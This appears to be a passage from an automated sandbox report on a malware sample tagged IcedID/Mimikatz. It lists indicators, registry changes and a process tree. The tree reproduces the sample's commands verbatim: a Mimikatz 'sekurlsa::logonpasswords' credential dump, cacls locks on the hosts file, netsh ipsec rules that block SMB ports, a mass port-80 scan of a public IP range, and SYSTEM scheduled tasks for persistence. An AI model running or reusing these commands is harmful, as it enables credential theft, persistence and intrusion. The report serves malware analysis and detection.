\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pnreyic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language asysoo.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4152 cmd.exe 4872 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0009000000023c60-7.dat nsis_installer_2 behavioral2/files/0x0007000000023c71-15.dat nsis_installer_1 behavioral2/files/0x0007000000023c71-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" pnreyic.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" pnreyic.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software cntrtrctt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cntrtrctt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing pnreyic.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ pnreyic.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4872 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3336 schtasks.exe 2276 schtasks.exe 4880 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found 648 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4276 pnreyic.exe Token: SeDebugPrivilege 1268 pnreyic.exe Token: SeDebugPrivilege 3588 vfshost.exe Token: SeLockMemoryPrivilege 2564 zergmt.exe Token: SeLockMemoryPrivilege 2564 zergmt.exe Token: SeDebugPrivilege 1552 cntrtrctt.exe Token: SeDebugPrivilege 400 cntrtrctt.exe Token: SeDebugPrivilege 3672 cntrtrctt.exe Token: SeDebugPrivilege 4516 cntrtrctt.exe Token: SeDebugPrivilege 4572 cntrtrctt.exe Token: SeDebugPrivilege 4440 cntrtrctt.exe Token: SeDebugPrivilege 4248 cntrtrctt.exe Token: SeDebugPrivilege 3296 cntrtrctt.exe Token: SeDebugPrivilege 4712 cntrtrctt.exe Token: SeDebugPrivilege 1516 cntrtrctt.exe Token: SeDebugPrivilege 5008 cntrtrctt.exe Token: SeDebugPrivilege 5088 cntrtrctt.exe Token: SeDebugPrivilege 220 cntrtrctt.exe Token: SeDebugPrivilege 2976 cntrtrctt.exe Token: SeDebugPrivilege 2104 cntrtrctt.exe Token: SeDebugPrivilege 3788 cntrtrctt.exe Token: SeDebugPrivilege 2088 cntrtrctt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe 4276 pnreyic.exe 4276 pnreyic.exe 1268 pnreyic.exe 1268 pnreyic.exe 1436 xohudmc.exe 1868 asysoo.exe 4144 pnreyic.exe 4144 pnreyic.exe 448 pnreyic.exe 448 pnreyic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3660 wrote to memory of 4152 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe 83 PID 3660 wrote to memory of 4152 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe 83 PID 3660 wrote to memory of 4152 3660 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe 83 PID 4152 wrote to memory of 4872 4152 cmd.exe 85 PID 4152 wrote to memory of 4872 4152 cmd.exe 85 PID 4152 wrote to memory of 4872 4152 cmd.exe 85 PID 4152 wrote to memory of 4276 4152 cmd.exe 87 PID 4152 wrote to memory of 4276 4152 cmd.exe 87 PID 4152 wrote to memory of 4276 4152 cmd.exe 87 PID 1268 wrote to memory of 1556 1268 pnreyic.exe 89 PID 1268 wrote to memory of 1556 1268 pnreyic.exe 89 PID 1268 wrote to memory of 1556 1268 pnreyic.exe 89 PID 1556 wrote to memory of 3892 1556 cmd.exe 92 PID 1556 wrote to memory of 3892 1556 cmd.exe 92 PID 1556 wrote to memory of 3892 1556 cmd.exe 92 PID 1556 wrote to memory of 3184 1556 cmd.exe 93 PID 1556 wrote to memory of 3184 1556 cmd.exe 93 PID 1556 wrote to memory of 3184 1556 cmd.exe 93 PID 1556 wrote to memory of 1744 1556 cmd.exe 94 PID 1556 wrote to memory of 1744 1556 cmd.exe 94 PID 1556 wrote to memory of 1744 1556 cmd.exe 94 PID 1556 wrote to memory of 3732 1556 cmd.exe 95 PID 1556 wrote to memory of 3732 1556 cmd.exe 95 PID 1556 wrote to memory of 3732 1556 cmd.exe 95 PID 1268 wrote to memory of 3156 1268 pnreyic.exe 96 PID 1268 wrote to memory of 3156 1268 pnreyic.exe 96 PID 1268 wrote to memory of 3156 1268 pnreyic.exe 96 PID 1556 wrote to memory of 3908 1556 cmd.exe 97 PID 1556 wrote to memory of 3908 1556 cmd.exe 97 PID 1556 wrote to memory of 3908 1556 cmd.exe 97 PID 1556 wrote to memory of 4724 1556 cmd.exe 98 PID 1556 wrote to memory of 4724 1556 cmd.exe 98 PID 1556 wrote to memory of 4724 1556 cmd.exe 98 PID 1268 wrote to memory of 4572 1268 pnreyic.exe 100 PID 1268 wrote to memory of 4572 1268 pnreyic.exe 100 PID 1268 wrote to memory of 4572 1268 pnreyic.exe 100 PID 1268 wrote to memory of 2736 1268 pnreyic.exe 102 PID 1268 wrote to memory of 2736 1268 pnreyic.exe 102 PID 1268 wrote to memory of 2736 1268 pnreyic.exe 102 PID 1268 wrote to memory of 3760 1268 pnreyic.exe 112 PID 1268 wrote to memory of 3760 1268 pnreyic.exe 112 PID 1268 wrote to memory of 3760 1268 pnreyic.exe 112 PID 3760 wrote to memory of 3032 3760 cmd.exe 114 PID 3760 wrote to memory of 3032 3760 cmd.exe 114 PID 3760 wrote to memory of 3032 3760 cmd.exe 114 PID 3032 wrote to memory of 1136 3032 wpcap.exe 115 PID 3032 wrote to memory of 1136 3032 wpcap.exe 115 PID 3032 wrote to memory of 1136 3032 wpcap.exe 115 PID 1136 wrote to memory of 1908 1136 net.exe 117 PID 1136 wrote to memory of 1908 1136 net.exe 117 PID 1136 wrote to memory of 1908 1136 net.exe 117 PID 3032 wrote to memory of 1300 3032 wpcap.exe 118 PID 3032 wrote to memory of 1300 3032 wpcap.exe 118 PID 3032 wrote to memory of 1300 3032 wpcap.exe 118 PID 1300 wrote to memory of 1468 1300 net.exe 120 PID 1300 wrote to memory of 1468 1300 net.exe 120 PID 1300 wrote to memory of 1468 1300 net.exe 120 PID 3032 wrote to memory of 4216 3032 wpcap.exe 121 PID 3032 wrote to memory of 4216 3032 wpcap.exe 121 PID 3032 wrote to memory of 4216 3032 wpcap.exe 121 PID 4216 wrote to memory of 2064 4216 net.exe 123 PID 4216 wrote to memory of 2064 4216 net.exe 123 PID 4216 wrote to memory of 2064 4216 net.exe 123 PID 3032 wrote to memory of 448 3032 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2124
-
C:\Windows\TEMP\gcettrccj\zergmt.exe"C:\Windows\TEMP\gcettrccj\zergmt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\hrmeszcf\pnreyic.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4872
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4276
-
-
-
C:\Windows\hrmeszcf\pnreyic.exeC:\Windows\hrmeszcf\pnreyic.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3892
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3908
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4724
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3156
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4572
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\nblmptktz\etgfqftjv\wpcap.exeC:\Windows\nblmptktz\etgfqftjv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1908
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2064
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:2156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4496 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3328 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2948
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:232
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4192
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt2⤵PID:2088
-
C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exeC:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nblmptktz\etgfqftjv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nblmptktz\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1452 -
C:\Windows\nblmptktz\Corporate\vfshost.exeC:\Windows\nblmptktz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "armegntcm" /ru system /tr "cmd /c C:\Windows\ime\pnreyic.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "szvqemctv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\hrmeszcf\pnreyic.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rbtkfiyzt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\gcettrccj\zergmt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3336
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2324
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2916
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1832
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1004
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
